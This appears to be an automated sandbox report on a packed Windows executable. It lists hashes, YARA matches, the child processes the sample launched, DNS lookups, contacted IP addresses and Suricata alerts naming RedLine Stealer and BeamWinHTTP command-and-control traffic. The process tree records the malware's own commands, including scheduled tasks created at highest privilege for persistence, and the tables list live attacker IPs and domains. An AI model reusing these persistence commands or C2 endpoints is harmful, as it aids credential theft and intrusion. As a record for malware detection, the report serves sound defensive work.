Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	Sept. 6, 2023, 7:39 a.m.	Sept. 6, 2023, 7:42 a.m.

Size	7.1MB
Type	PE32 executable (GUI) Intel 80386, for MS Windows
MD5	`ca7502cd02a0a170d9f4305c18410126`
SHA256	`907ed7e8aa2058d9e4509c779c9525356965992271ade6991af8bd4bbcdee260`
CRC32	`96D7554A`
ssdeep	`196608:p6eXl2olmwb1nxbAsDMsCegYQRYEMIbYq:s6l2ogwxnx8sAdGQRl5Mq`
Yara	Malicious_Library_Zero - Malicious_Library UPX_Zero - UPX packed file PE_Header_Zero - PE File Signature VMProtect_Zero - VMProtect packed file IsPE32 - (no description)

Services.exe "C:\Users\test22\AppData\Local\Temp\Services.exe"
2540
- qZa2Z7Puv7E4iAuW3ONvhvPf.exe "C:\Users\test22\Documents\qZa2Z7Puv7E4iAuW3ONvhvPf.exe"
  2780
  - EPOgquOT1MnP1nqso8haYw46.exe "C:\Users\test22\Pictures\Minor Policy\EPOgquOT1MnP1nqso8haYw46.exe"
    1536
    - regsvr32.exe "C:\Windows\System32\regsvr32.exe" /U .\VVTQR9K.VA3 -s
      3040
  - U_WUTTisAZX3VLe2b40_scVK.exe "C:\Users\test22\Pictures\Minor Policy\U_WUTTisAZX3VLe2b40_scVK.exe"
    2760
  - nPtRtTHIn9wndsrAGmvS3n2G.exe "C:\Users\test22\Pictures\Minor Policy\nPtRtTHIn9wndsrAGmvS3n2G.exe"
    2752
    - vbc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
      2608
  - sVRSTvhMzuBInyoVatf1LIkj.exe "C:\Users\test22\Pictures\Minor Policy\sVRSTvhMzuBInyoVatf1LIkj.exe"
    1616
    - Install.exe .\Install.exe
      2128
      - Install.exe .\Install.exe /rpdidWAf "525403" /S
        1784
  - Ms6gVLaCMj3QjsT0nxwUAzQV.exe "C:\Users\test22\Pictures\Minor Policy\Ms6gVLaCMj3QjsT0nxwUAzQV.exe"
    2756
  - x7v28_ox_gsKhD1Q9EW3AnPz.exe "C:\Users\test22\Pictures\Minor Policy\x7v28_ox_gsKhD1Q9EW3AnPz.exe"
    1332
  - kSIDO1g7b2Ov3jXySZx1v2JG.exe "C:\Users\test22\Pictures\Minor Policy\kSIDO1g7b2Ov3jXySZx1v2JG.exe"
    1308
- schtasks.exe schtasks /create /f /RU "test22" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
  2816
- schtasks.exe schtasks /create /f /RU "test22" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
  2884

Name	Response	Post-Analysis Lookup
preconcert.pw	A 104.21.84.222 A 172.67.197.101	172.67.197.101
api.db-ip.com	A 104.26.5.15 A 104.26.4.15 A 172.67.75.166	104.26.4.15
yandex.ru	A 5.255.255.77 A 77.88.55.88 A 77.88.55.60 A 5.255.255.70	77.88.55.60
twitter.com	A 104.244.42.65	104.244.42.129
ipinfo.io	A 34.117.59.81	34.117.59.81
sso.passport.yandex.ru	A 213.180.204.24 CNAME passport.yandex.ru	213.180.204.24
sergejbukotko.com	A 172.67.214.144 A 104.21.59.53	172.67.214.144
sun6-23.userapi.com	A 95.142.206.3	95.142.206.3
vk.com	A 87.240.129.133 A 87.240.132.72 A 87.240.132.67 A 87.240.137.164 A 93.186.225.194 A 87.240.132.78	87.240.132.67
sun6-21.userapi.com	A 95.142.206.1	95.142.206.1
apps.identrust.com	A 121.254.136.9 CNAME a1952.dscq.akamai.net CNAME identrust.edgesuite.net A 121.254.136.18 A 23.32.56.72 A 23.32.56.80	23.67.53.17
dzen.ru	A 62.217.160.2	62.217.160.2
www.maxmind.com	A 104.18.145.235 A 104.18.146.235	104.18.146.235
api.myip.com	A 172.67.75.163 A 104.26.9.59 A 104.26.8.59	172.67.75.163
telegram.org	A 149.154.167.99	149.154.167.99
red.mk	A 141.95.126.89	141.95.126.89
sun6-20.userapi.com	A 95.142.206.0	95.142.206.0
ironhost.io	A 104.21.57.237 A 172.67.193.129	104.21.57.237
230809204625331.nes.dtf99.top	A 179.43.158.2	94.156.35.76
psv4.userapi.com	A 87.240.137.134 A 87.240.190.89 CNAME ps.userapi.com A 87.240.190.76 A 87.240.137.140	87.240.190.76
iplis.ru	A 148.251.234.93	148.251.234.93
db-ip.com	A 104.26.5.15 A 104.26.4.15 A 172.67.75.166	104.26.5.15

IP Address	Status	Action
176.123.9.85	Active	Moloch
185.225.74.51	Active	Moloch
104.18.145.235	Active	Moloch
104.18.146.235	Active	Moloch
104.21.59.53	Active	Moloch
104.244.42.65	Active	Moloch
104.26.5.15	Active	Moloch
104.26.9.59	Active	Moloch
121.254.136.18	Active	Moloch
141.95.126.89	Active	Moloch
148.251.234.93	Active	Moloch
149.154.167.99	Active	Moloch
164.124.101.2	Active	Moloch
172.67.193.129	Active	Moloch
172.67.197.101	Active	Moloch
172.67.75.163	Active	Moloch
172.67.75.166	Active	Moloch
179.43.158.2	Active	Moloch
185.225.73.32	Active	Moloch
193.42.32.118	Active	Moloch
208.67.104.60	Active	Moloch
213.180.204.24	Active	Moloch
23.32.56.80	Active	Moloch
34.117.59.81	Active	Moloch
45.15.156.229	Active	Moloch
45.9.74.80	Active	Moloch
62.217.160.2	Active	Moloch
77.88.55.60	Active	Moloch
85.208.136.10	Active	Moloch
87.240.129.133	Active	Moloch
87.240.137.140	Active	Moloch
93.186.225.194	Active	Moloch
94.142.138.131	Active	Moloch
94.156.253.187	Active	Moloch
95.142.206.0	Active	Moloch
95.142.206.1	Active	Moloch
95.142.206.3	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 149.154.167.99:443 -> 192.168.56.101:49163	2029340	ET INFO TLS Handshake Failure	Potentially Bad Traffic
TCP 192.168.56.101:49166 -> 77.88.55.60:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49161 -> 149.154.167.99:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49177 -> 104.26.5.15:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49167 -> 62.217.160.2:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49176 -> 104.26.5.15:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49179 -> 104.18.146.235:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49181 -> 94.156.253.187:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.101:49164 -> 104.244.42.65:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49181 -> 94.156.253.187:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.101:49173 -> 94.142.138.131:80	2045779	ET MALWARE Win32/BeamWinHTTP CnC Activity M2 (GET)	Malware Command and Control Activity Detected
TCP 94.156.253.187:80 -> 192.168.56.101:49181	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 94.156.253.187:80 -> 192.168.56.101:49181	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 192.168.56.101:49168 -> 213.180.204.24:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49171 -> 172.67.193.129:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49170 -> 193.42.32.118:80	2045779	ET MALWARE Win32/BeamWinHTTP CnC Activity M2 (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49174 -> 34.117.59.81:443	2025331	ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io)	Device Retrieving External IP Address Detected
TCP 192.168.56.101:49174 -> 34.117.59.81:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49174 -> 34.117.59.81:443	2025331	ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io)	Device Retrieving External IP Address Detected
TCP 192.168.56.101:49174 -> 34.117.59.81:443	2025331	ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io)	Device Retrieving External IP Address Detected
TCP 192.168.56.101:49185 -> 94.142.138.131:80	2045779	ET MALWARE Win32/BeamWinHTTP CnC Activity M2 (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49187 -> 34.117.59.81:443	2025331	ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io)	Device Retrieving External IP Address Detected
TCP 192.168.56.101:49187 -> 34.117.59.81:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49187 -> 34.117.59.81:443	2025331	ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io)	Device Retrieving External IP Address Detected
UDP 192.168.56.101:58887 -> 164.124.101.2:53	2016778	ET DNS Query to a *.pw domain - Likely Hostile	Potentially Bad Traffic
TCP 192.168.56.101:49190 -> 93.186.225.194:80	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.101:49190 -> 93.186.225.194:80	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49197 -> 104.21.59.53:80	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.101:49191 -> 93.186.225.194:80	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.101:49197 -> 104.21.59.53:80	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49199 -> 172.67.197.101:80	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49189 -> 93.186.225.194:80	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 172.67.197.101:80 -> 192.168.56.101:49199	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.101:49189 -> 93.186.225.194:80	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49193 -> 93.186.225.194:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49201 -> 172.67.197.101:80	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.101:49201 -> 172.67.197.101:80	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49198 -> 104.21.59.53:80	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.101:49198 -> 104.21.59.53:80	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49196 -> 93.186.225.194:80	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.101:49196 -> 93.186.225.194:80	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 104.21.59.53:80 -> 192.168.56.101:49200	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.101:49207 -> 172.67.197.101:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 172.67.197.101:80 -> 192.168.56.101:49204	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.101:49205 -> 104.21.59.53:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49195 -> 93.186.225.194:80	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.101:49195 -> 93.186.225.194:80	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49210 -> 141.95.126.89:443	2230002	SURICATA TLS invalid record type	Generic Protocol Command Decode
TCP 192.168.56.101:49209 -> 93.186.225.194:80	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.101:49210 -> 141.95.126.89:443	2230010	SURICATA TLS invalid record/traffic	Generic Protocol Command Decode
TCP 192.168.56.101:49209 -> 93.186.225.194:80	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49210 -> 141.95.126.89:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 141.95.126.89:443 -> 192.168.56.101:49210	2230002	SURICATA TLS invalid record type	Generic Protocol Command Decode
TCP 141.95.126.89:443 -> 192.168.56.101:49210	2230010	SURICATA TLS invalid record/traffic	Generic Protocol Command Decode
TCP 192.168.56.101:49211 -> 93.186.225.194:80	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.101:49211 -> 93.186.225.194:80	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49212 -> 141.95.126.89:443	2230002	SURICATA TLS invalid record type	Generic Protocol Command Decode
TCP 192.168.56.101:49212 -> 141.95.126.89:443	2230010	SURICATA TLS invalid record/traffic	Generic Protocol Command Decode
TCP 192.168.56.101:49212 -> 141.95.126.89:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49219 -> 141.95.126.89:443	2230002	SURICATA TLS invalid record type	Generic Protocol Command Decode
TCP 192.168.56.101:49219 -> 141.95.126.89:443	2230010	SURICATA TLS invalid record/traffic	Generic Protocol Command Decode
TCP 192.168.56.101:49219 -> 141.95.126.89:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 141.95.126.89:443 -> 192.168.56.101:49219	2230002	SURICATA TLS invalid record type	Generic Protocol Command Decode
TCP 141.95.126.89:443 -> 192.168.56.101:49219	2230010	SURICATA TLS invalid record/traffic	Generic Protocol Command Decode
TCP 192.168.56.101:49224 -> 93.186.225.194:80	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.101:49221 -> 93.186.225.194:80	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.101:49221 -> 93.186.225.194:80	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49226 -> 93.186.225.194:80	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.101:49235 -> 93.186.225.194:80	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.101:49235 -> 93.186.225.194:80	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49232 -> 93.186.225.194:80	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.101:49240 -> 95.142.206.3:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49229 -> 93.186.225.194:80	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.101:49229 -> 93.186.225.194:80	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49239 -> 93.186.225.194:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49241 -> 93.186.225.194:80	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.101:49249 -> 95.142.206.1:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49222 -> 141.95.126.89:443	2230002	SURICATA TLS invalid record type	Generic Protocol Command Decode
TCP 192.168.56.101:49222 -> 141.95.126.89:443	2230010	SURICATA TLS invalid record/traffic	Generic Protocol Command Decode
TCP 192.168.56.101:49222 -> 141.95.126.89:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 141.95.126.89:443 -> 192.168.56.101:49222	2230002	SURICATA TLS invalid record type	Generic Protocol Command Decode
TCP 141.95.126.89:443 -> 192.168.56.101:49222	2230010	SURICATA TLS invalid record/traffic	Generic Protocol Command Decode
TCP 192.168.56.101:49225 -> 141.95.126.89:443	2230002	SURICATA TLS invalid record type	Generic Protocol Command Decode
TCP 192.168.56.101:49225 -> 141.95.126.89:443	2230010	SURICATA TLS invalid record/traffic	Generic Protocol Command Decode
TCP 141.95.126.89:443 -> 192.168.56.101:49225	2230002	SURICATA TLS invalid record type	Generic Protocol Command Decode
TCP 141.95.126.89:443 -> 192.168.56.101:49225	2230010	SURICATA TLS invalid record/traffic	Generic Protocol Command Decode
TCP 192.168.56.101:49230 -> 93.186.225.194:80	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.101:49230 -> 93.186.225.194:80	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49214 -> 93.186.225.194:80	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.101:49214 -> 93.186.225.194:80	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49231 -> 93.186.225.194:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49243 -> 93.186.225.194:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49213 -> 93.186.225.194:80	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.101:49213 -> 93.186.225.194:80	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49215 -> 141.95.126.89:443	2230002	SURICATA TLS invalid record type	Generic Protocol Command Decode
TCP 192.168.56.101:49215 -> 141.95.126.89:443	2230010	SURICATA TLS invalid record/traffic	Generic Protocol Command Decode
TCP 141.95.126.89:443 -> 192.168.56.101:49215	2230002	SURICATA TLS invalid record type	Generic Protocol Command Decode
TCP 141.95.126.89:443 -> 192.168.56.101:49215	2230010	SURICATA TLS invalid record/traffic	Generic Protocol Command Decode
TCP 192.168.56.101:49216 -> 93.186.225.194:80	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.101:49216 -> 93.186.225.194:80	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 93.186.225.194:80 -> 192.168.56.101:49220	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.101:49248 -> 93.186.225.194:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49186 -> 172.67.75.163:443	2042969	ET INFO Observed External IP Lookup Domain in TLS SNI (api .myip .com)	Device Retrieving External IP Address Detected
TCP 192.168.56.101:49186 -> 172.67.75.163:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49217 -> 93.186.225.194:80	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.101:49217 -> 93.186.225.194:80	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49228 -> 93.186.225.194:80	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.101:49238 -> 93.186.225.194:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49242 -> 87.240.137.140:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49245 -> 95.142.206.0:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49244 -> 93.186.225.194:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49246 -> 87.240.137.140:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49267 -> 34.117.59.81:443	2025331	ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io)	Device Retrieving External IP Address Detected
TCP 192.168.56.101:49267 -> 34.117.59.81:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49267 -> 34.117.59.81:443	2025331	ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io)	Device Retrieving External IP Address Detected
TCP 192.168.56.101:49267 -> 34.117.59.81:443	2025331	ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io)	Device Retrieving External IP Address Detected
TCP 192.168.56.101:49272 -> 148.251.234.93:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49280 -> 104.26.5.15:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49275 -> 176.123.9.85:16482	2043233	ET INFO Microsoft net.tcp Connection Initialization Activity	Potentially Bad Traffic
TCP 192.168.56.101:49275 -> 176.123.9.85:16482	2046045	ET MALWARE [ANY.RUN] RedLine Stealer Related (MC-NMF Authorization)	A Network Trojan was detected
TCP 192.168.56.101:49275 -> 176.123.9.85:16482	2046105	ET MALWARE Redline Stealer TCP CnC Activity - MSValue (Outbound)	A Network Trojan was detected
TCP 192.168.56.101:49275 -> 176.123.9.85:16482	2046105	ET MALWARE Redline Stealer TCP CnC Activity - MSValue (Outbound)	A Network Trojan was detected
TCP 192.168.56.101:49283 -> 104.18.145.235:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49277 -> 34.117.59.81:443	2025331	ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io)	Device Retrieving External IP Address Detected
TCP 192.168.56.101:49277 -> 34.117.59.81:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49277 -> 34.117.59.81:443	2025331	ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io)	Device Retrieving External IP Address Detected
TCP 192.168.56.101:49277 -> 34.117.59.81:443	2025331	ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io)	Device Retrieving External IP Address Detected
TCP 192.168.56.101:49279 -> 172.67.75.166:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 176.123.9.85:16482 -> 192.168.56.101:49275	2046056	ET MALWARE Redline Stealer Activity (Response)	A Network Trojan was detected
TCP 192.168.56.101:49288 -> 87.240.129.133:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49292 -> 45.9.74.80:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.101:49292 -> 45.9.74.80:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.101:49295 -> 87.240.129.133:80	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.101:49270 -> 185.225.74.51:44767	2043233	ET INFO Microsoft net.tcp Connection Initialization Activity	Potentially Bad Traffic
TCP 192.168.56.101:49270 -> 185.225.74.51:44767	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.101:49270 -> 185.225.74.51:44767	2046045	ET MALWARE [ANY.RUN] RedLine Stealer Related (MC-NMF Authorization)	A Network Trojan was detected
TCP 185.225.74.51:44767 -> 192.168.56.101:49270	2043234	ET MALWARE Redline Stealer TCP CnC - Id1Response	A Network Trojan was detected
TCP 192.168.56.101:49270 -> 185.225.74.51:44767	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.101:49270 -> 185.225.74.51:44767	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.101:49285 -> 87.240.129.133:80	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.101:49285 -> 87.240.129.133:80	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 185.225.74.51:44767 -> 192.168.56.101:49270	2046056	ET MALWARE Redline Stealer Activity (Response)	A Network Trojan was detected
TCP 192.168.56.101:49270 -> 185.225.74.51:44767	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.101:49270 -> 185.225.74.51:44767	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.101:49286 -> 87.240.129.133:80	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.101:49270 -> 185.225.74.51:44767	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.101:49270 -> 185.225.74.51:44767	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.101:49270 -> 185.225.74.51:44767	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.101:49270 -> 185.225.74.51:44767	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.101:49270 -> 185.225.74.51:44767	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.101:49270 -> 185.225.74.51:44767	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 148.251.234.93:443 -> 192.168.56.101:49273	2029340	ET INFO TLS Handshake Failure	Potentially Bad Traffic
UDP 192.168.56.101:54361 -> 164.124.101.2:53	2023883	ET DNS Query to a *.top domain - Likely Hostile	Potentially Bad Traffic
TCP 192.168.56.101:49291 -> 45.9.74.80:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.101:49290 -> 87.240.129.133:80	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.101:49290 -> 87.240.129.133:80	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49291 -> 45.9.74.80:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.101:49293 -> 179.43.158.2:80	2022896	ET HUNTING SUSPICIOUS Firesale gTLD EXE DL with no Referer June 13 2016	A Network Trojan was detected
TCP 192.168.56.101:49293 -> 179.43.158.2:80	2023882	ET INFO HTTP Request to a *.top domain	Potentially Bad Traffic
TCP 45.9.74.80:80 -> 192.168.56.101:49291	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 45.9.74.80:80 -> 192.168.56.101:49291	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 192.168.56.101:49293 -> 179.43.158.2:80	2022896	ET HUNTING SUSPICIOUS Firesale gTLD EXE DL with no Referer June 13 2016	A Network Trojan was detected
TCP 192.168.56.101:49297 -> 87.240.129.133:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49264 -> 104.26.9.59:443	2042969	ET INFO Observed External IP Lookup Domain in TLS SNI (api .myip .com)	Device Retrieving External IP Address Detected
TCP 192.168.56.101:49264 -> 104.26.9.59:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49259 -> 45.15.156.229:80	2045779	ET MALWARE Win32/BeamWinHTTP CnC Activity M2 (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49269 -> 185.225.73.32:44973	2043233	ET INFO Microsoft net.tcp Connection Initialization Activity	Potentially Bad Traffic
TCP 192.168.56.101:49269 -> 185.225.73.32:44973	2046045	ET MALWARE [ANY.RUN] RedLine Stealer Related (MC-NMF Authorization)	A Network Trojan was detected
TCP 192.168.56.101:49269 -> 185.225.73.32:44973	2046105	ET MALWARE Redline Stealer TCP CnC Activity - MSValue (Outbound)	A Network Trojan was detected
TCP 192.168.56.101:49269 -> 185.225.73.32:44973	2046105	ET MALWARE Redline Stealer TCP CnC Activity - MSValue (Outbound)	A Network Trojan was detected
TCP 192.168.56.101:49276 -> 94.142.138.131:80	2045779	ET MALWARE Win32/BeamWinHTTP CnC Activity M2 (GET)	Malware Command and Control Activity Detected
TCP 185.225.73.32:44973 -> 192.168.56.101:49269	2046056	ET MALWARE Redline Stealer Activity (Response)	A Network Trojan was detected
